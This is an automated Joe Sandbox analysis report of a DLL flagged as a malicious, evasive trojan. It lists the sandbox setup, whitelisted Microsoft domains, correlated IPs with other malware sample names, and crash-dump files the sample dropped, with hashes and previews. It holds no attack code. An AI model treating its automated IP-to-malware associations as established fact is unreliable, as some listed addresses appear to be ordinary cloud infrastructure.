Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 500413
Start date: 12.10.2021
Start time: 00:35:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 23s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 616412739e268.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.troj.evad.winDLL@14/12@24/10
EGA Information: Failed
HDC Information:
• Successful, ratio: 18% (good quality ratio 16.9%)
• Quality average: 77.6%
• Quality standard deviation: 30%
HCA Information:
• Successful, ratio: 68%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .dll
• Override analysis time to 240s for rundll32
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 23.203.141.148, 93.184.221.240, 8.247.248.223, 8.247.248.249, 8.247.244.249, 20.82.210.154, 13.89.179.12, 204.79.197.203, 52.168.117.173, 20.189.173.22, 2.20.178.24, 2.20.178.33, 20.54.110.249, 52.251.79.25, 40.112.88.60, 52.184.81.210
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, onedsblobprdwus17.westus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, onedsblobprdcus17.centralus.cloudapp.azure.com, a1449.dscg2.akamai.net, wu.azureedge.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, a-0003.a-msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

Time | Type | Description
00:37:39 | API Interceptor | 8x Sleep call for process: rundll32.exe modified
00:37:49 | API Interceptor | 8x Sleep call for process: loaddll32.exe modified
00:37:57 | API Interceptor | 3x Sleep call for process: WerFault.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

Match | Associated Sample Name / URL | Detection | Context
40.101.124.226 | S5.exe | malicious |
40.97.153.146 | m87xfb63XU.dll | malicious |
 | test1.dll | malicious |
 | 7.dll | malicious |
 | nT5pUwoJSS.dll | malicious |
 | 5instructio.exe | malicious |
 | .exe | malicious |
 | 61Documen.exe | malicious |
 | 65document.exe | malicious |
 | 29mail98@vip.son.exe | malicious |
 | 57document.exe | malicious |
13.82.28.61 | 45DOC00111738011537818635391-pdf.exe | malicious | msn.com/

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        XK1PLPuwjL.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        pHEiqE9toa.msiGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        SecuriteInfo.com.W32.AIDetect.malware2.24481.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        vH0SHswvrb.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        NM0NyvZi8O.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        yOTzv1Qz0n.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        SWaTAV7EdD.exeGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_d4e7795f79114aeb9c4dc9cc69e25e6282339_82810a17_1874b820\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 12044
Entropy (8bit): 3.765368455363511
Encrypted: false
SSDEEP: 192:0YuiJ0oXAHBUZMX4jed+x/u7sAwS274It7cJ:MinXoBUZMX4je8/u7sAwX4It7cJ
MD5: 316CE6E876A182906C00DD2AD8F35040
SHA1: 54AD11020F6730D0C756C5682E1BAEA55AE1F317
SHA-256: 74EA72682FCB32B1165308196313E62BADE799EF2947E6D132D5A0D077219B19
SHA-512: 749DD024BDC05C4918700FCF5740173D68F7FCEF20A4C56BCFF2D894123A628A78AF6B8103512056FBBEF378828B4AAEA3F757FA297DF91C155835C7FD19E77C
Malicious: false
                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.6.5.4.6.8.2.6.1.5.0.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.6.5.4.7.5.6.0.5.2.3.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.2.d.3.f.3.5.-.4.3.8.7.-.4.f.e.d.-.b.7.a.f.-.7.6.8.4.9.9.3.f.7.a.9.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.0.4.5.a.6.7.-.2.2.2.e.-.4.c.7.2.-.b.b.e.c.-.0.8.9.b.4.0.8.1.c.f.f.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.0.-.0.0.0.1.-.0.0.1.b.-.d.a.8.9.-.2.e.6.0.f.0.b.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_d4e7795f79114aeb9c4dc9cc69e25e6282339_82810a17_19a08827\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 12246
Entropy (8bit): 3.765114618947458
Encrypted: false
SSDEEP: 192:ogaPiW0oX7HBUZMX4jed+j/u7sSS274It7cl:oJPiQXbBUZMX4jeO/u7sSX4It7cl
MD5: 9CF8099E09C39847EFFF6FB7B70CEA33
SHA1: 16B081768605B3C60E9DBF23A1646EBDF70337E0
SHA-256: D780C3F704283D57B71AE6362A0F6095E72DEDC4D08062E15094DF7FA1DAD471
SHA-512: F9873C535120F8E9BEF91F26B93B9251BD6F06F506E7D53E5EDDAE3E23AE04674686E39BD8BB186632AFF0A43717117E4F61818502AE49E938D546F5FA34EE37
Malicious: false
                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.6.5.4.7.9.9.9.8.3.1.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.6.5.4.9.3.9.0.4.4.8.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.1.d.e.5.4.7.-.b.d.c.0.-.4.a.7.4.-.9.0.f.e.-.4.f.e.1.f.8.d.b.f.f.b.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.e.9.a.1.f.8.-.8.2.c.a.-.4.a.c.0.-.9.c.1.f.-.0.4.d.d.4.9.8.8.b.9.8.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.0.-.0.0.0.1.-.0.0.1.b.-.f.8.7.1.-.3.6.6.7.f.0.b.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_d4e7795f79114aeb9c4dc9cc69e25e6282339_82810a17_1be8e7ac\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 12040
Entropy (8bit): 3.7654289890935924
Encrypted: false
SSDEEP: 192:43iu0oX/HBUZMX4jed+x/u7sAwS274It7c/V:IiYX/BUZMX4je8/u7sAwX4It7c/V
MD5: 47234B5A061C3D57518C75D012598E15
SHA1: 8054E955AA6274E52832CECAC7BF98AB2AAC4A3E
SHA-256: BF44ADFD50F9CC39C25CC5B4642FD4EE5C007226F9AEDC5BBCA7FBA5DDBF6E4F
SHA-512: 273E8DA585B81F6C6468E2BFFE4E452420D55F06597B6BE6F59747DB2FB96326B7C015A610D4D5A5B1F663593E3398E04C118600B7A5838156B1A568928CE7C6
Malicious: false
                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.6.5.4.7.5.0.8.9.8.8.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.6.5.4.8.8.7.3.0.5.2.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.9.5.e.6.6.3.-.8.9.1.b.-.4.5.3.4.-.a.c.6.0.-.b.9.b.2.2.c.2.8.0.c.a.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.a.7.1.d.2.7.-.d.c.2.f.-.4.e.0.1.-.a.e.c.e.-.3.b.4.9.0.b.5.1.3.6.2.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.5.4.-.0.0.0.1.-.0.0.1.b.-.2.7.a.b.-.4.b.6.2.f.0.b.e.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EDD.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Mon Oct 11 22:37:50 2021, 0x1205a4 type
Category: dropped
Size (bytes): 35838
Entropy (8bit): 2.3956337648230916
Encrypted: false
SSDEEP: 192:zRpsH1iJ4InP5sfRuvUM+sOI36GDZ69CA4nxZN5knmhpIRY:dCkiInERYN+i6G0s1nF5kmc2
MD5: 6314F249ADC86966FA67E57AE5C44922
SHA1: FFCAA1E89BAD579997BE419D71AA5F670200CD69
SHA-256: 39A76F75342336856B50BBC0B977FBE57722A50B0BD0008499FBBC2A0B263C10
SHA-512: 95B2148C5D3E31169DD1EBF64FACE7B4728DB4473EA9EC225A992B4BFD640E8E9C29393C9BDE50C99E9EAA94FB45EAA11BECFCC3CF2DE1063EDA9ACA9EA02DBB
Malicious: false
                                                                                                                        Preview: MDMP....... .........da...................U...........B..............GenuineIntelW...........T...........T.da"............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WER270C.tmp.WERInternalMetadata.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 8404
Entropy (8bit): 3.698373923142492
Encrypted: false
SSDEEP: 192:Rrl7r3GLNi/j/6ZCy6YoDz6Tofg4dgmf8zSNz+prz89bDdsf0Bm:RrlsNiL/6oy6YCz6Tofg4dgmf8zSNjDk
MD5: D9504C279DAD3BB36B90B2ABB8BD6024
SHA1: 8F897066FFB317B3CB6FE7CEDDCD657ABEFA0AD2
SHA-256: 10A8657425ED12843DE5D88E4AC5FB228E04E30FC2285B5ABFAB0644D4F5FDED
SHA-512: 1E599A129E128BDA89BBD6B4D4EBB20D56F4B4C3576399CFAF5B5EA8B4227ECE0156F047B9B628EA4091B4D3D829501B68118A87EA09EC46B4ECCE0E714F16F8
Malicious: false
                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.7.2.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WER29CC.tmp.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4771
Entropy (8bit): 4.4859311182693515
Encrypted: false
SSDEEP: 48:cvIwSD8zsdNJgtWI9jZVWSC8B2+8fm8M4JCdsTMF3+q8vjsTJO4SrSWd:uITf9EqSN07JNmKiJODWWd
MD5: 14148F5D29C531D9A2DAB8BE378319B4
SHA1: 2555ADA459F857D0F04C818ED0FA3523FBAEDA54
SHA-256: 345133599386F0C3CD20ADF62510BA963E25DC1EE938691229F2E011F02CCF15
SHA-512: FDC853B50B28C8C90540AB31EBB67DE00BA0BEBE28A69CE469CCECE120487E62648DBF600DFC5F3F58211436306E7276FB12B579879897A84E1DD82E612446B0
Malicious: false
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1205748" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER398A.tmp.dmp
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Oct 11 22:37:57 2021, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):34760
                                                                                                                        Entropy (8bit):2.413605188260289
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:NICEknpSR00ugBtrvUM+sOI36FDZuzLNR2GK0KHnIZ1S1:PEPTN+i6FknX2GQIZ1C
                                                                                                                        MD5:FE3A9A57895A11BBDE379864BD34A1AA
                                                                                                                        SHA1:4660CCA0FFEDA2D9F0CC371B0E756BEBEE1E59CA
                                                                                                                        SHA-256:D3DAFB26C47511DD9A99713F077D9D3503749D9A128772ED3BCE2381FAD98C2B
                                                                                                                        SHA-512:5BF3A8825B1CBFB3F54916D2BE008CEC447763A16AB6A130FD3A78496E6D3DB5C9239FCEF211919354E6B78A3070072128C6A646F42403F0935A44ADB14B951E
                                                                                                                        Malicious:false
                                                                                                                        Preview: MDMP....... ........da...................U...........B..............GenuineIntelW...........T.......T...X.da!............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4543.tmp.WERInternalMetadata.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8412
                                                                                                                        Entropy (8bit):3.6972167795220234
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNiV36p6Yo76njOxp2+Pgmf8zSNz+pry89bLFsflZm:RrlsNiF6p6YU6axp2+Pgmf8zSNcLefy
                                                                                                                        MD5:76872B4F10DAB5548F7C5A90D51D5856
                                                                                                                        SHA1:09F65EB354956B8BDF85D560CB00855480EDA67B
                                                                                                                        SHA-256:7590A90E442F73573110BB00A58EC1D1B8B6E6A7F8C43CA37ECB25682A052922
                                                                                                                        SHA-512:8E63F1986DE67951325919E86C1A72F463AAD58723FE2E3710743EC271304908CF6D0C12B2CF3E2C6AF141782DC7BF36C68EC556A88DC3E01F000761D828CFCC
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.6.4.<./.P.i.d.>.......
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A83.tmp.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4771
                                                                                                                        Entropy (8bit):4.486599306136513
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsdNJgtWI9jZVWSC8B2r8fm8M4JCdsTMFl+q8vjsTh4SrSh6d:uITf9EqSN0IJNoKihDWh6d
                                                                                                                        MD5:F5119CC37CD940B95701B555B8405D56
                                                                                                                        SHA1:0F6AEC842D402C511BC033B95CDDE4B721F845CA
                                                                                                                        SHA-256:7B59F212C271180A12BD3B2F239E245B604E7BE9F2F6D4BDD729106A8E0E63E5
                                                                                                                        SHA-512:CAF3A254182B3FA64D7552562B9144A51D49A778C28225E64364D84C9B46F065861BF8E23F693BBCA769AB0D02137C69AB3B75B120D2C2582A245C0804917952
                                                                                                                        Malicious:false
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1205748" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4CB4.tmp.dmp
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Oct 11 22:38:06 2021, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):36016
                                                                                                                        Entropy (8bit):2.4897777598497166
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:xC0HXLDCwswpbRb3TZO2ODjUyrcFl7yuQM8BXEZniQcd9eq:s0771b1WUyrcPSM8Biinyq
                                                                                                                        MD5:559FD5E2D54239F3AF7994402E1F225A
                                                                                                                        SHA1:6F975E163EC0244D6973DCF1058DC318A990BAAF
                                                                                                                        SHA-256:4E9B64C1A7891E3469C235B9E4F92693B6D9451B09FE8BB64D09FA8CFDA9EF47
                                                                                                                        SHA-512:B03EA1DB6B58C4DFCD6BACEBC95BFD282F11D8BE9DF5F0ECF7F32F958898832D290CD6ED3B21D6D8A40C201D81B71625C0E6F27C670708CF7536212D02B6BAAB
                                                                                                                        Malicious:false
